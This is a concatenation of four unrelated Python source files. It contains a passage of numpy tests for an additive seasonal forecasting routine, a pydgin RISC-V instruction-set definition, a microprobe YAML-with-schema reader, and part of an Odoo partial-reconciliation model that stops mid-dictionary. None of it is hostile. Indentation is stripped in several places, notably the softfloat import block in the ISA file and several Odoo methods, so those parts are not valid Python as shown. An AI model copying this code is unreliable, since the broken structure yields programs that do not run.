        "Additive output should have a max of 29.5736...",
    )
    assert_almost_equal(
        np.amin(synHat150to200),
        7.9430807703401669,
        8,
        "Additive output should have a min of 7.943...",
    )
    assert_almost_equal(
        np.mean(synHat150to200),
        19.911560325896119,
        8,
        "Additive output should have average of 19.911...",
    )
    # create 5th set of 50 "days", 200-250 (modulation plus slow oscillation)
    t200to250 = np.arange(20001, 25001)
    syn200to250 = 20 + (
        (10.0 * np.sin(t200to250 * (2 * np.pi) / 100.0))
        * (1 * np.cos(t200to250 * (2 * np.pi) / 5000.0))
        + 20 * np.sin(t200to250 * (2 * np.pi) / 5000.0)
    )
    # run the additive method on the 5th set of 50 "days"
    (
        synHat200to250,
        sHat200to250,
        sigma200to250,
        syn250,
        s250,
        l250,
        b250,
        sigma250,
    ) = sq.additive(
        syn200to250,
        m,
        alpha,
        beta,
        gamma,
        phi,
        yhat0=syn200,
        l0=l200,
        b0=b200,
        s0=s200,
        sigma0=sigma200,
    )
    # Check max, min and average
    assert_almost_equal(
        np.amax(synHat200to250),
        43.417782188651529,
        8,
        "Additive output should have a max of 43.417...",
    )
    assert_almost_equal(
        np.amin(synHat200to250),
        -3.4170071669726791,
        8,
        "Additive output should have a min of -3.417...",
    )
    assert_almost_equal(
        np.mean(synHat200to250),
        20.09191068952186,
        8,
        "Additive output should have average of 20.0919...",
    )
    # create 5th set of 50 "days", 250-300 (same signal plus Gaussian noise)
    t250to300 = np.arange(25001, 30001)
    # fixed seed keeps the noisy expectations below reproducible
    np.random.seed(123456789)
    syn250to300 = (
        20
        + (
            (10.0 * np.sin(t250to300 * (2 * np.pi) / 100.0))
            * (1 * np.cos(t250to300 * (2 * np.pi) / 5000.0))
            + 20 * np.sin(t250to300 * (2 * np.pi) / 5000.0)
        )
        + 5 * np.random.randn(5000)
    )
    # run the additive method on the 5th set of 50 "days"
    (
        synHat250to300,
        sHat250to300,
        sigma250to300,
        syn300,
        s300,
        l300,
        b300,
        sigma300,
    ) = sq.additive(
        syn250to300,
        m,
        alpha,
        beta,
        gamma,
        phi,
        yhat0=syn250,
        l0=l250,
        b0=b250,
        s0=s250,
        sigma0=sigma250,
    )
    # Check max, min and average
    assert_almost_equal(
        np.amax(synHat250to300),
        49.3099797861343534,
        8,
        "Additive output should have a max of 49.309...",
    )
    # NOTE(review): message says "-8.783" but the expected value is
    # -8.7531... -- message typo only, the assertion itself is consistent.
    assert_almost_equal(
        np.amin(synHat250to300),
        -8.7531069723345301,
        8,
        "Additive output should have a min of -8.783...",
    )
    assert_almost_equal(
        np.mean(synHat250to300),
        20.006498585824623,
        8,
        "Additive output should have average of 20.006...",
    )
|
#=======================================================================
# isa.py
#=======================================================================
# Check if importing softfloat will succeed. If it's not built, then
# softfloat._abi will not exist and throw and ImportError
try:
import softfloat
ENABLE_FP = True
except ImportError:
print ( "WARNING: softfloat could not be imported because it was not "
"built. Floating point will be disabled. Build softfloat using "
"build-softfloat.py script under scripts/ to enable floating "
"point support." )
ENABLE_FP = False
except AttributeError:
print ( "WARNING: the CFFI installation doesn't support "
"_cffi_backend.FFI() call. Floating point will be disabled. "
"Upgrade CFFI to enable floating point support." )
ENABLE_FP = False
from utils import sext_32, signed, sext, trim
from pydgin.misc import create_risc_decoder, FatalError, \
NotImplementedInstError
from pydgin.utils import (
trim_32, specialize, intmask, bits2float, float2bits
)
from helpers import *
from csr import PRV_U, PRV_S, PRV_H, PRV_M
import isa_RV32I, isa_RV64I, isa_RV32M, isa_RV64M, isa_RV32A, isa_RV64A
# TODO: super hacky! fixme to only import encoding_* funcs!
from isa_RV32I import *
from isa_RV64I import *
from isa_RV32M import *
from isa_RV64M import *
from isa_RV32A import *
from isa_RV64A import *
if ENABLE_FP:
import isa_RV32F, isa_RV64F, isa_RV32D, isa_RV64D
from isa_RV32F import *
from isa_RV64F import *
from isa_RV32D import *
from isa_RV64D import *
#=======================================================================
# Register Definitions
#=======================================================================
# Register-name -> register-index map used when parsing assembly.
# Integer registers are accepted under three spellings ($N, xN, and the
# ABI mnemonics); floating point registers under two (fN and the ABI
# mnemonics). The integer and FP name spaces intentionally overlap: each
# maps into the 0-31 index range of its own register file.
reg_map = {
  '$0' : 0, '$1' : 1, '$2' : 2, '$3' : 3,
  '$4' : 4, '$5' : 5, '$6' : 6, '$7' : 7,
  '$8' : 8, '$9' : 9, '$10' : 10, '$11' : 11,
  '$12' : 12, '$13' : 13, '$14' : 14, '$15' : 15,
  '$16' : 16, '$17' : 17, '$18' : 18, '$19' : 19,
  '$20' : 20, '$21' : 21, '$22' : 22, '$23' : 23,
  '$24' : 24, '$25' : 25, '$26' : 26, '$27' : 27,
  '$28' : 28, '$29' : 29, '$30' : 30, '$31' : 31,
  'x0' : 0, 'x1' : 1, 'x2' : 2, 'x3' : 3,
  'x4' : 4, 'x5' : 5, 'x6' : 6, 'x7' : 7,
  'x8' : 8, 'x9' : 9, 'x10' : 10, 'x11' : 11,
  'x12' : 12, 'x13' : 13, 'x14' : 14, 'x15' : 15,
  'x16' : 16, 'x17' : 17, 'x18' : 18, 'x19' : 19,
  'x20' : 20, 'x21' : 21, 'x22' : 22, 'x23' : 23,
  'x24' : 24, 'x25' : 25, 'x26' : 26, 'x27' : 27,
  'x28' : 28, 'x29' : 29, 'x30' : 30, 'x31' : 31,
  # abi as of jan 2015:
  # https://blog.riscv.org/wp-content/uploads/2015/01/riscv-calling.pdf
  'zero' : 0, 'ra' : 1, 'sp' : 2, 'gp' : 3,
  'tp' : 4, 't0' : 5, 't1' : 6, 't2' : 7,
  's0' : 8, 's1' : 9, 'a0' : 10, 'a1' : 11,
  'a2' : 12, 'a3' : 13, 'a4' : 14, 'a5' : 15,
  'a6' : 16, 'a7' : 17, 's2' : 18, 's3' : 19,
  's4' : 20, 's5' : 21, 's6' : 22, 's7' : 23,
  's8' : 24, 's9' : 25, 's10' : 26, 's11' : 27,
  't3' : 28, 't4' : 29, 't5' : 30, 't6' : 31,
  # 'fp' is an alias for 's0'/'x8' (frame pointer)
  'fp' : 8,
  # floating point
  'f0' : 0, 'f1' : 1, 'f2' : 2, 'f3' : 3,
  'f4' : 4, 'f5' : 5, 'f6' : 6, 'f7' : 7,
  'f8' : 8, 'f9' : 9, 'f10' : 10, 'f11' : 11,
  'f12' : 12, 'f13' : 13, 'f14' : 14, 'f15' : 15,
  'f16' : 16, 'f17' : 17, 'f18' : 18, 'f19' : 19,
  'f20' : 20, 'f21' : 21, 'f22' : 22, 'f23' : 23,
  'f24' : 24, 'f25' : 25, 'f26' : 26, 'f27' : 27,
  'f28' : 28, 'f29' : 29, 'f30' : 30, 'f31' : 31,
  # abi as of jan 2015:
  # https://blog.riscv.org/wp-content/uploads/2015/01/riscv-calling.pdf
  'ft0' : 0, 'ft1' : 1, 'ft2' : 2, 'ft3' : 3,
  'ft4' : 4, 'ft5' : 5, 'ft6' : 6, 'ft7' : 7,
  'fs0' : 8, 'fs1' : 9, 'fa0' : 10, 'fa1' : 11,
  'fa2' : 12, 'fa3' : 13, 'fa4' : 14, 'fa5' : 15,
  'fa6' : 16, 'fa7' : 17, 'fs2' : 18, 'fs3' : 19,
  'fs4' : 20, 'fs5' : 21, 'fs6' : 22, 'fs7' : 23,
  'fs8' : 24, 'fs9' : 25, 'fs10' : 26, 'fs11' : 27,
  'ft8' : 28, 'ft9' : 29, 'ft10' : 30, 'ft11' : 31,
}
#=======================================================================
# Instruction Encodings
#=======================================================================
# Hand-written encodings that are not part of the generated RV32/RV64
# tables: supervisor-level ops, CSR accesses, the four reserved
# custom-opcode groups (each with its rs1/rs2/rd operand variants), plus
# two FP load/store patterns aliased to nop (see HACK note below).
# Each entry is [name, 32-bit pattern] where 'x' marks a don't-care bit;
# the name selects the matching execute_<name> handler at decode time.
other_encodings = [
  ['sret', '00010000000000000000000001110011'],
  ['sfence_vm', '000100000001xxxxx000000001110011'],
  ['wfi', '00010000001000000000000001110011'],
  ['mrth', '00110000011000000000000001110011'],
  ['mrts', '00110000010100000000000001110011'],
  ['hrts', '00100000010100000000000001110011'],
  ['csrrw', 'xxxxxxxxxxxxxxxxx001xxxxx1110011'],
  ['csrrs', 'xxxxxxxxxxxxxxxxx010xxxxx1110011'],
  ['csrrc', 'xxxxxxxxxxxxxxxxx011xxxxx1110011'],
  ['csrrwi', 'xxxxxxxxxxxxxxxxx101xxxxx1110011'],
  ['csrrsi', 'xxxxxxxxxxxxxxxxx110xxxxx1110011'],
  ['csrrci', 'xxxxxxxxxxxxxxxxx111xxxxx1110011'],
  ['custom0', 'xxxxxxxxxxxxxxxxx000xxxxx0001011'],
  ['custom0_rs1', 'xxxxxxxxxxxxxxxxx010xxxxx0001011'],
  ['custom0_rs1_rs2', 'xxxxxxxxxxxxxxxxx011xxxxx0001011'],
  ['custom0_rd', 'xxxxxxxxxxxxxxxxx100xxxxx0001011'],
  ['custom0_rd_rs1', 'xxxxxxxxxxxxxxxxx110xxxxx0001011'],
  ['custom0_rd_rs1_rs2', 'xxxxxxxxxxxxxxxxx111xxxxx0001011'],
  ['custom1', 'xxxxxxxxxxxxxxxxx000xxxxx0101011'],
  ['custom1_rs1', 'xxxxxxxxxxxxxxxxx010xxxxx0101011'],
  ['custom1_rs1_rs2', 'xxxxxxxxxxxxxxxxx011xxxxx0101011'],
  ['custom1_rd', 'xxxxxxxxxxxxxxxxx100xxxxx0101011'],
  ['custom1_rd_rs1', 'xxxxxxxxxxxxxxxxx110xxxxx0101011'],
  ['custom1_rd_rs1_rs2', 'xxxxxxxxxxxxxxxxx111xxxxx0101011'],
  ['custom2', 'xxxxxxxxxxxxxxxxx000xxxxx1011011'],
  ['custom2_rs1', 'xxxxxxxxxxxxxxxxx010xxxxx1011011'],
  ['custom2_rs1_rs2', 'xxxxxxxxxxxxxxxxx011xxxxx1011011'],
  ['custom2_rd', 'xxxxxxxxxxxxxxxxx100xxxxx1011011'],
  ['custom2_rd_rs1', 'xxxxxxxxxxxxxxxxx110xxxxx1011011'],
  ['custom2_rd_rs1_rs2', 'xxxxxxxxxxxxxxxxx111xxxxx1011011'],
  ['custom3', 'xxxxxxxxxxxxxxxxx000xxxxx1111011'],
  ['custom3_rs1', 'xxxxxxxxxxxxxxxxx010xxxxx1111011'],
  ['custom3_rs1_rs2', 'xxxxxxxxxxxxxxxxx011xxxxx1111011'],
  ['custom3_rd', 'xxxxxxxxxxxxxxxxx100xxxxx1111011'],
  ['custom3_rd_rs1', 'xxxxxxxxxxxxxxxxx110xxxxx1111011'],
  ['custom3_rd_rs1_rs2', 'xxxxxxxxxxxxxxxxx111xxxxx1111011'],
  # HACK: mapping fsd and fld ops to nop for translatable subset
  ['nop', 'xxxxxxxxxxxxxxxxx011xxxxx0000111'],
  ['nop', 'xxxxxxxxxxxxxxxxx011xxxxx0100111'],
]
# Assemble the final decode table: base integer ISAs (RV32I/RV64I), the
# standard M (mul/div) and A (atomics) extensions, the F/D floating-point
# extensions (only when softfloat imported successfully; otherwise FP
# instructions simply fail to decode), and the hand-written encodings above.
base_enc = ( isa_RV32I.encodings + isa_RV64I.encodings )
extn_enc = ( isa_RV32M.encodings + isa_RV64M.encodings
           + isa_RV32A.encodings + isa_RV64A.encodings )
if ENABLE_FP:
  fp_enc = ( isa_RV32F.encodings + isa_RV64F.encodings
           + isa_RV32D.encodings + isa_RV64D.encodings )
else:
  fp_enc = []
encodings = base_enc + extn_enc + fp_enc + other_encodings
#=======================================================================
# Instruction Definitions
#=======================================================================
def execute_nop( s, inst ):
  # No architectural effect; just advance to the next instruction word.
  s.pc = s.pc + 4
def execute_sret( s, inst ):
  # Return from trap handler: jump to the exception PC saved for the
  # current privilege level (machine or supervisor).
  target_pc = None
  if s.prv == PRV_M:
    target_pc = s.mepc
  if s.prv == PRV_S:
    target_pc = s.sepc
  if target_pc is None:
    # sret is meaningless at other privilege levels -- treat as fatal.
    raise FatalError( "sret encountered on privilege level %d" % s.prv )
  s.pc = target_pc
# Privileged / implementation-specific operations that this simulator does
# not model. Each handler raises immediately; the original trailing
# 's.pc += 4' statements were unreachable after the unconditional raise and
# have been removed.

def execute_sfence_vm( s, inst ):
  raise NotImplementedInstError()

def execute_wfi( s, inst ):
  raise NotImplementedInstError()

def execute_mrth( s, inst ):
  raise NotImplementedInstError()

def execute_mrts( s, inst ):
  raise NotImplementedInstError()

def execute_hrts( s, inst ):
  raise NotImplementedInstError()
def execute_csrrw( s, inst ):
  # CSRRW: atomic read/write -- rd <- old CSR value, CSR <- rs1.
  addr = inst.csr
  previous = s.csr.get_csr( addr )
  s.csr.set_csr( addr, s.rf[inst.rs1] )
  s.rf[inst.rd] = previous
  s.pc += 4
def execute_csrrs( s, inst ):
  # CSRRS: atomic read and set bits -- rd <- old value, CSR <- old | rs1.
  addr = inst.csr
  previous = s.csr.get_csr( addr )
  s.csr.set_csr( addr, previous | s.rf[inst.rs1] )
  s.rf[inst.rd] = previous
  s.pc += 4
def execute_csrrc( s, inst ):
  # CSRRC: atomic read and clear bits -- rd <- old value, CSR <- old & ~rs1.
  addr = inst.csr
  previous = s.csr.get_csr( addr )
  s.csr.set_csr( addr, previous & ~s.rf[inst.rs1] )
  s.rf[inst.rd] = previous
  s.pc += 4
def execute_csrrwi( s, inst ):
  # CSRRWI: like csrrw, but the source is the zero-extended immediate.
  addr = inst.csr
  previous = s.csr.get_csr( addr )
  s.csr.set_csr( addr, inst.zimm )
  s.rf[inst.rd] = previous
  s.pc += 4
def execute_csrrsi( s, inst ):
  # CSRRSI: like csrrs, but the set-mask is the zero-extended immediate.
  addr = inst.csr
  previous = s.csr.get_csr( addr )
  s.csr.set_csr( addr, previous | inst.zimm )
  s.rf[inst.rd] = previous
  s.pc += 4
def execute_csrrci( s, inst ):
  # CSRRCI: like csrrc, but the clear-mask is the zero-extended immediate.
  addr = inst.csr
  previous = s.csr.get_csr( addr )
  s.csr.set_csr( addr, previous & ~inst.zimm )
  s.rf[inst.rd] = previous
  s.pc += 4
# The custom0-custom3 opcode slots are reserved for non-standard extensions;
# this simulator implements none of them, so every handler raises. The
# original bodies carried an unreachable 's.pc += 4' after the raise, which
# has been removed (dead code).

def execute_custom0( s, inst ):
  raise NotImplementedInstError()

def execute_custom0_rs1( s, inst ):
  raise NotImplementedInstError()

def execute_custom0_rs1_rs2( s, inst ):
  raise NotImplementedInstError()

def execute_custom0_rd( s, inst ):
  raise NotImplementedInstError()

def execute_custom0_rd_rs1( s, inst ):
  raise NotImplementedInstError()

def execute_custom0_rd_rs1_rs2( s, inst ):
  raise NotImplementedInstError()

def execute_custom1( s, inst ):
  raise NotImplementedInstError()

def execute_custom1_rs1( s, inst ):
  raise NotImplementedInstError()

def execute_custom1_rs1_rs2( s, inst ):
  raise NotImplementedInstError()

def execute_custom1_rd( s, inst ):
  raise NotImplementedInstError()

def execute_custom1_rd_rs1( s, inst ):
  raise NotImplementedInstError()

def execute_custom1_rd_rs1_rs2( s, inst ):
  raise NotImplementedInstError()

def execute_custom2( s, inst ):
  raise NotImplementedInstError()

def execute_custom2_rs1( s, inst ):
  raise NotImplementedInstError()

def execute_custom2_rs1_rs2( s, inst ):
  raise NotImplementedInstError()

def execute_custom2_rd( s, inst ):
  raise NotImplementedInstError()

def execute_custom2_rd_rs1( s, inst ):
  raise NotImplementedInstError()

def execute_custom2_rd_rs1_rs2( s, inst ):
  raise NotImplementedInstError()

def execute_custom3( s, inst ):
  raise NotImplementedInstError()

def execute_custom3_rs1( s, inst ):
  raise NotImplementedInstError()

def execute_custom3_rs1_rs2( s, inst ):
  raise NotImplementedInstError()

def execute_custom3_rd( s, inst ):
  raise NotImplementedInstError()

def execute_custom3_rd_rs1( s, inst ):
  raise NotImplementedInstError()

def execute_custom3_rd_rs1_rs2( s, inst ):
  raise NotImplementedInstError()
#=======================================================================
# Create Decoder
#=======================================================================
decode = create_risc_decoder( encodings, globals(), debug=True )
|
<gh_stars>1-10
# Copyright 2018 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""":mod:`microprobe.utils.yaml` module
"""
# Futures
from __future__ import absolute_import
# Built-in modules
import os
# Third party modules
import yaml
from rxjson.Rx import Error, Factory # @UnresolvedImport
# Own modules
from microprobe.exceptions import MicroprobeCacheError, \
MicroprobeYamlFormatError
from microprobe.utils.cache import read_default_cache_data, \
update_cache_needed, write_default_cache_data
from microprobe.utils.logger import get_logger
# Constants
LOG = get_logger(__name__)
__all__ = ["read_yaml"]
# Functions
def _read_yaml(filename):
    """Read a YAML file, serving the default cache when it is up to date.

    :param filename: Path of the YAML file to read.
    :return: The parsed YAML contents.
    :raise MicroprobeYamlFormatError: if the file is missing or malformed.
    """
    result = update_cache_needed([filename])

    if not result:
        # Cache is current: try it first, falling back to a real parse.
        try:
            return read_default_cache_data(filename)
        except MicroprobeCacheError:
            LOG.debug("Unable to read cache data for '%s'", filename)

    if not os.path.isfile(filename):
        raise MicroprobeYamlFormatError(
            "File '%s' referenced in YAML definition not found" % filename
        )

    with open(filename, 'r') as yaml_fd:
        raw_data = yaml_fd.read()

    # The original code had four separate except clauses, the last being a
    # duplicated (and therefore unreachable) yaml.scanner.ScannerError
    # handler with an identical body; they are consolidated here.
    try:
        data = yaml.safe_load(raw_data)
    except (yaml.composer.ComposerError,
            yaml.scanner.ScannerError,
            yaml.parser.ParserError) as exc:
        raise MicroprobeYamlFormatError(
            "YAML parsing error while processing "
            "file '%s'. Error reported: '%s'" % (filename, str(exc))
        )

    # Best effort: a cache failure must not break the read itself.
    try:
        write_default_cache_data(filename, data)
    except MicroprobeCacheError:
        LOG.debug("Unable to update cache data for '%s'", filename)

    return data
def _create_yaml_schema(filename):
    """Build an Rx schema object from a YAML schema definition file.

    :param filename: Path of the YAML file holding the schema definition.
    :return: The compiled Rx schema.
    :raise MicroprobeYamlFormatError: if the schema definition is invalid.
    """
    raw_schema = _read_yaml(filename)
    factory = Factory({"register_core_types": True})
    try:
        return factory.make_schema(raw_schema)
    except Error as error:
        raise MicroprobeYamlFormatError(
            "Invalid schema definition in '%s'.\n"
            "Error message:%s" % (filename, error)
        )
def read_yaml(data_file, schema_file):
    """Read *data_file*, validate it against *schema_file* and return it.

    The parsed data is served from the default cache when neither the data
    file nor the schema file changed since the cache was written.

    :param data_file: YAML file containing the data.
    :param schema_file: YAML file containing the Rx schema definition.
    :raise MicroprobeYamlFormatError: if the data does not match the schema.
    """
    LOG.debug("Start")
    LOG.debug("Data file: %s", data_file)
    LOG.debug("Schema file: %s", schema_file)

    # Short-circuits: the schema file is only checked when the data file
    # cache is still valid (same as the original two-step assignment).
    cache_stale = update_cache_needed([data_file]) or \
        update_cache_needed([schema_file])

    data = None
    loaded_from_cache = False
    if not cache_stale:
        LOG.debug("Using cache contents for '%s'", data_file)
        try:
            data = read_default_cache_data(data_file)
            loaded_from_cache = True
        except MicroprobeCacheError:
            LOG.debug("Unable to read cache data for '%s'", data_file)

    if not loaded_from_cache:
        data = _read_yaml(data_file)

    if data is None:
        LOG.warning("No data found in file: %s", data_file)
        LOG.debug("End")
        return data

    schema = _create_yaml_schema(schema_file)
    if not schema.check(data):
        LOG.info("Schema not validated")
        if isinstance(data, list):
            # Re-check element by element so the log pinpoints the culprit.
            LOG.info("Check each element to provide a nice hint to the error")
            for cdata in data:
                if not schema.check([cdata]):
                    LOG.info("Element failing:")
                    for line in yaml.dump(
                        cdata, default_flow_style=False
                    ).split('\n'):
                        LOG.info(line)
        raise MicroprobeYamlFormatError(
            "YAML definition file in"
            "'%s' does not follow the "
            "schema definition in '%s'" % (data_file, schema_file)
        )

    LOG.debug("End")
    return data
# Classes
|
# -*- coding: utf-8 -*-
from odoo import api, fields, models, _
from odoo.exceptions import UserError, ValidationError
from datetime import date
class AccountPartialReconcile(models.Model):
    """Partial reconciliation linking one debit journal item to one credit
    journal item, carrying the matched amount in company currency and in
    each line's own currency."""
    _name = "account.partial.reconcile"
    _description = "Partial Reconcile"
    _rec_name = "id"

    # ==== Reconciliation fields ====
    debit_move_id = fields.Many2one(
        comodel_name='account.move.line',
        index=True, required=True)
    credit_move_id = fields.Many2one(
        comodel_name='account.move.line',
        index=True, required=True)
    # Set once the matched lines are fully reconciled; cleared partials
    # drag their full reconcile away with them (see unlink()).
    full_reconcile_id = fields.Many2one(
        comodel_name='account.full.reconcile',
        string="Full Reconcile", copy=False)

    # ==== Currency fields ====
    company_currency_id = fields.Many2one(
        comodel_name='res.currency',
        string="Company Currency",
        related='company_id.currency_id',
        help="Utility field to express amount currency")
    # Computed from the move line's currency, with a fallback on the
    # company currency (see _compute_debit_currency_id).
    debit_currency_id = fields.Many2one(
        comodel_name='res.currency',
        store=True,
        compute='_compute_debit_currency_id',
        string="Currency of the debit journal item.")
    credit_currency_id = fields.Many2one(
        comodel_name='res.currency',
        store=True,
        compute='_compute_credit_currency_id',
        string="Currency of the credit journal item.")

    # ==== Amount fields ====
    amount = fields.Monetary(
        currency_field='company_currency_id',
        help="Always positive amount concerned by this matching expressed in the company currency.")
    debit_amount_currency = fields.Monetary(
        currency_field='debit_currency_id',
        help="Always positive amount concerned by this matching expressed in the debit line foreign currency.")
    credit_amount_currency = fields.Monetary(
        currency_field='credit_currency_id',
        help="Always positive amount concerned by this matching expressed in the credit line foreign currency.")

    # ==== Other fields ====
    company_id = fields.Many2one(
        comodel_name='res.company',
        string="Company", store=True, readonly=False,
        related='debit_move_id.company_id')
    max_date = fields.Date(
        string="Max Date of Matched Lines", store=True,
        compute='_compute_max_date',
        help="Technical field used to determine at which date this reconciliation needs to be shown on the "
             "aged receivable/payable reports.")
# -------------------------------------------------------------------------
# CONSTRAINT METHODS
# -------------------------------------------------------------------------
@api.constrains('debit_currency_id', 'credit_currency_id')
def _check_required_computed_currencies(self):
bad_partials = self.filtered(lambda partial: not partial.debit_currency_id or not partial.credit_currency_id)
if bad_partials:
raise ValidationError(_("Missing foreign currencies on partials having ids: %s", bad_partials.ids))
# -------------------------------------------------------------------------
# COMPUTE METHODS
# -------------------------------------------------------------------------
@api.depends('debit_move_id.date', 'credit_move_id.date')
def _compute_max_date(self):
for partial in self:
partial.max_date = max(
partial.debit_move_id.date,
partial.credit_move_id.date
)
@api.depends('debit_move_id')
def _compute_debit_currency_id(self):
for partial in self:
partial.debit_currency_id = partial.debit_move_id.currency_id \
or partial.debit_move_id.company_currency_id
@api.depends('credit_move_id')
def _compute_credit_currency_id(self):
for partial in self:
partial.credit_currency_id = partial.credit_move_id.currency_id \
or partial.credit_move_id.company_currency_id
# -------------------------------------------------------------------------
# LOW-LEVEL METHODS
# -------------------------------------------------------------------------
    def unlink(self):
        """Delete the partials (OVERRIDE).

        On top of the regular deletion, also unlink the full reconcile
        records linked to the current partials and reverse the tax cash
        basis (CABA) journal entries they generated. The order of
        operations below is load-bearing: the partials must be gone before
        the full reconciles / reversals are processed.
        """
        # Avoid cyclic unlink calls when removing the partials that could remove some full reconcile
        # and then, loop again and again.
        if not self:
            return True

        # Retrieve the matching number to unlink.
        full_to_unlink = self.full_reconcile_id

        # Retrieve the CABA entries to reverse.
        moves_to_reverse = self.env['account.move'].search([('tax_cash_basis_rec_id', 'in', self.ids)])

        # Unlink partials before doing anything else to avoid 'Record has already been deleted' due to the recursion.
        res = super().unlink()

        # Reverse CABA entries. Reversals dated inside a locked period are
        # moved to today so they remain postable.
        today = fields.Date.context_today(self)
        default_values_list = [{
            'date': move.date if move.date > (move.company_id.period_lock_date or date.min) else today,
            'ref': _('Reversal of: %s') % move.name,
        } for move in moves_to_reverse]
        moves_to_reverse._reverse_moves(default_values_list, cancel=True)

        # Remove the matching numbers.
        full_to_unlink.unlink()

        return res
# -------------------------------------------------------------------------
# RECONCILIATION METHODS
# -------------------------------------------------------------------------
    def _collect_tax_cash_basis_values(self):
        ''' Collect all information needed to create the tax cash basis journal entries on the current partials.

        :return: A dictionary mapping each move_id to the result of 'account_move._collect_tax_cash_basis_values'.
                 Also, add the 'partials' key being a list of dictionaries, one for each partial to process:
                 * partial:      The account.partial.reconcile record.
                 * percentage:   The reconciled percentage represented by the partial.
                 * payment_rate: The applied currency rate of this partial.
        '''
        tax_cash_basis_values_per_move = {}

        if not self:
            return {}

        for partial in self:
            # A set: when debit and credit lines belong to the same move it
            # is visited only once.
            for move in {partial.debit_move_id.move_id, partial.credit_move_id.move_id}:

                # Collect data about cash basis.
                if move.id not in tax_cash_basis_values_per_move:
                    tax_cash_basis_values_per_move[move.id] = move._collect_tax_cash_basis_values()

                # Nothing to process on the move.
                if not tax_cash_basis_values_per_move.get(move.id):
                    continue
                move_values = tax_cash_basis_values_per_move[move.id]

                # Check the cash basis configuration only when at least one cash basis tax entry need to be created.
                journal = partial.company_id.tax_cash_basis_journal_id

                if not journal:
                    raise UserError(_("There is no tax cash basis journal defined for the '%s' company.\n"
                                      "Configure it in Accounting/Configuration/Settings") % partial.company_id.display_name)

                partial_amount = 0.0
                partial_amount_currency = 0.0
                rate_amount = 0.0
                rate_amount_currency = 0.0

                # Whichever side of the partial belongs to this move is the
                # 'source'; the opposite line is the 'counterpart' (payment).
                if partial.debit_move_id.move_id == move:
                    partial_amount += partial.amount
                    partial_amount_currency += partial.debit_amount_currency
                    rate_amount -= partial.credit_move_id.balance
                    rate_amount_currency -= partial.credit_move_id.amount_currency
                    source_line = partial.debit_move_id
                    counterpart_line = partial.credit_move_id

                if partial.credit_move_id.move_id == move:
                    partial_amount += partial.amount
                    partial_amount_currency += partial.credit_amount_currency
                    rate_amount += partial.debit_move_id.balance
                    rate_amount_currency += partial.debit_move_id.amount_currency
                    source_line = partial.credit_move_id
                    counterpart_line = partial.debit_move_id

                if move_values['currency'] == move.company_id.currency_id:
                    # Percentage made on company's currency.
                    percentage = partial_amount / move_values['total_balance']
                else:
                    # Percentage made on foreign currency.
                    percentage = partial_amount_currency / move_values['total_amount_currency']

                if source_line.currency_id != counterpart_line.currency_id:
                    # When the invoice and the payment are not sharing the same foreign currency, the rate is computed
                    # on-the-fly using the payment date.
                    payment_rate = self.env['res.currency']._get_conversion_rate(
                        counterpart_line.company_currency_id,
                        source_line.currency_id,
                        counterpart_line.company_id,
                        counterpart_line.date,
                    )
                elif rate_amount:
                    payment_rate = rate_amount_currency / rate_amount
                else:
                    payment_rate = 0.0

                partial_vals = {
                    'partial': partial,
                    'percentage': percentage,
                    'payment_rate': payment_rate,
                }

                # Add partials.
                move_values.setdefault('partials', [])
                move_values['partials'].append(partial_vals)

        # Clean-up moves having nothing to process.
        return {k: v for k, v in tax_cash_basis_values_per_move.items() if v}
@api.model
def _prepare_cash_basis_base_line_vals(self, base_line, balance, amount_currency):
''' Prepare the values to be used to create the cash basis journal items for the tax base line
passed as parameter.
:param base_line: An account.move.line being the base of some taxes.
:param balance: The balance to consider for this line.
:param amount_currency: The balance in foreign currency to consider for this line.
:return: A python dictionary that could be passed to the create method of
account.move.line.
'''
account = base_line.company_id.account_cash_basis_base_account_id or base_line.account_id
return {
'name': base_line.move_id.name,
'debit': balance if balance > 0.0 else 0.0,
'credit': -balance if balance < 0.0 else 0.0,
'amount_currency': amount_currency,
'currency_id': base_line.currency_id.id,
'partner_id': base_line.partner_id.id,
'account_id': account.id,
'tax_ids': [(6, 0, base_line.tax_ids.ids)],
'tax_tag_ids': [(6, 0, base_line._convert_tags_for_cash_basis(base_line.tax_tag_ids).ids)],
'tax_exigible': True,
}
@api.model
def _prepare_cash_basis_counterpart_base_line_vals(self, cb_base_line_vals):
''' Prepare the move line used as a counterpart of the line created by
_prepare_cash_basis_base_line_vals.
:param cb_base_line_vals: The line returned by _prepare_cash_basis_base_line_vals.
:return: A python dictionary that could be passed to the create method of
account.move.line.
'''
return {
'name': cb_base_line_vals['name'],
'debit': cb_base_line_vals['credit'],
'credit': cb_base_line_vals['debit'],
'account_id': cb_base_line_vals['account_id'],
'amount_currency': -cb_base_line_vals['amount_currency'],
'currency_id': cb_base_line_vals['currency_id'],
'partner_id': cb_base_line_vals['partner_id'],
'tax_exigible': True,
}
@api.model
def _prepare_cash_basis_tax_line_vals(self, tax_line, balance, amount_currency):
''' Prepare the move line corresponding to a tax in the cash basis entry.
:param tax_line: An account.move.line record being a tax line.
:param balance: The balance to consider for this line.
:param amount_currency: The balance in foreign currency to consider for this line.
:return: A python dictionary that could be passed to the create method of
account.move.line.
'''
return {
'name': tax_line.name,
'debit': balance if balance > 0.0 else 0.0,
'credit': -balance if balance < 0.0 else 0.0,
'tax_base_amount': tax_line.tax_base_amount,
'tax_repartition_line_id': tax_line.tax_repartition_line_id.id,
'tax_ids': [(6, 0, tax_line.tax_ids.ids)],
'tax_tag_ids': [(6, 0, tax_line._convert_tags_for_cash_basis(tax_line.tax_tag_ids).ids)],
'account_id': tax_line.tax_repartition_line_id.account_id.id or tax_line.account_id.id,
'amount_currency': amount_currency,
'currency_id': tax_line.currency_id.id,
'partner_id': tax_line.partner_id.id,
'tax_exigible': True,
}
@api.model
def _prepare_cash_basis_counterpart_tax_line_vals(self, tax_line, cb_tax_line_vals):
''' Prepare the move line used as a counterpart of the line created by
_prepare_cash_basis_tax_line_vals.
:param tax_line: An account.move.line record being a tax line.
:param cb_tax_line_vals: The result of _prepare_cash_basis_counterpart_tax_line_vals.
:return: A python dictionary that could be passed to the create method of
account.move.line.
'''
return {
'name': cb_tax_line_vals['name'],
'debit': cb_tax_line_vals['credit'],
'credit': cb_tax_line_vals['debit'],
'account_id': tax_line.account_id.id,
